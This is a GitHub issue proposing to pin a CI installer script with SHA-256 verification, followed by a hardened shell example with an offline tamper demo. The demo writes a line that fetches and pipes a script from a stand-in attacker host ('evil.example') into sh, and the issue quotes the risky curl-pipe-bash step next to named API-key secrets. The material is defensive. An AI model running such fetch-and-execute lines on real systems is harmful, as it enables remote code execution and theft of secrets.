
Supply chain: pin qoder.com installer with sha256 verification #43

@zpzjzj

Description

Context: .github/workflows/ci.yml:219 runs curl -fsSL https://qoder.com/install | bash in the e2e job, which also has high-value secrets in env (DASHSCOPE_API_KEY, QODER_PERSONAL_ACCESS_TOKEN, ANTHROPIC_API_KEY, OPENAI_API_KEY). An upstream compromise or redirect downgrade would immediately exfiltrate them.

Proposal:

  1. Pin the installer to a specific release tarball/version.
  2. Capture the script once, store its sha256 in-repo, verify before `bash`.
  3. Or install via a published package manager artifact (release tarball + checksum).

Tracked from: PR #33 self-review M2.
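Options 1 and 2 of the proposal, as an added example that is not the project's workflow and not the issue author's code: the script is downloaded to disk, its SHA-256 is compared against a digest pinned in the repository, and only on a match is it handed to bash. The URL is the one from the issue; the checksum file path `.github/qoder-install.sha256`, the function names, and the `demo` inputs are assumptions made here.

```shell
#!/bin/sh
# Added example (not the project's code): replace `curl ... | bash` with
# download -> verify pinned SHA-256 -> run. Assumed: the pinned digest lives in
# .github/qoder-install.sha256 (bare hex or `<digest>  <name>` form); function
# names are ours.
set -eu

# Print the SHA-256 hex digest of a file (coreutils sha256sum on Linux,
# shasum on macOS runners).
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | cut -d' ' -f1
  else
    shasum -a 256 "$1" | cut -d' ' -f1
  fi
}

# Read the pinned digest out of a checksum file (first field, newline dropped).
pinned_sha256() {
  cut -d' ' -f1 "$1" | tr -d '\n'
}

# verify_script FILE EXPECTED: returns 0 on match, 1 on mismatch, printing
# both digests to stderr so a CI log shows exactly what changed.
verify_script() {
  actual=$(sha256_of "$1")
  if [ "$actual" != "$2" ]; then
    printf 'checksum mismatch for %s\n  expected: %s\n  actual:   %s\n' \
      "$1" "$2" "$actual" >&2
    return 1
  fi
}

# fetch_verify_run URL EXPECTED: the hardened CI step. The script is written
# to a temp file and checked before bash ever sees it; --proto '=https'
# refuses a plain-http downgrade (and, unless --proto-redir is set, applies
# to redirects too); -f plus set -e make a truncated or failed download fail
# the step instead of running a partial script.
fetch_verify_run() {
  tmp=$(mktemp)
  rc=0
  if curl -fsSL --proto '=https' --tlsv1.2 -o "$tmp" "$1" \
     && verify_script "$tmp" "$2"; then
    bash "$tmp" || rc=$?
  else
    rc=1
  fi
  rm -f "$tmp"
  return $rc
}

# Offline demo with a constructed installer: pin its digest, tamper with the
# file and confirm verification fails, restore it and confirm it passes.
demo() {
  dir=$(mktemp -d)
  printf 'echo install ok\n' > "$dir/install"
  sha256_of "$dir/install" > "$dir/install.sha256"              # pin it
  printf 'curl http://evil.example/x | sh\n' >> "$dir/install"  # tamper
  if verify_script "$dir/install" "$(pinned_sha256 "$dir/install.sha256")" 2>/dev/null; then
    rm -rf "$dir"; return 1                                     # must NOT verify
  fi
  printf 'echo install ok\n' > "$dir/install"                   # restore
  rc=0
  verify_script "$dir/install" "$(pinned_sha256 "$dir/install.sha256")" || rc=$?
  rm -rf "$dir"
  return $rc
}

demo && echo 'demo: pinned digest verified, tampered copy rejected'
```

In the e2e job the install step then becomes a call along the lines of `fetch_verify_run https://qoder.com/install "$(pinned_sha256 .github/qoder-install.sha256)"`, and the job fails before any secret-bearing step runs if the served script differs from what was reviewed. Updating the installer becomes a deliberate change: regenerate the digest and bump the pin in a PR. One caveat: this pins only the script itself; if the script in turn downloads binaries without pinning them, those fetches need the same treatment, which is what option 3 (a release tarball with its own checksum) gives directly.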
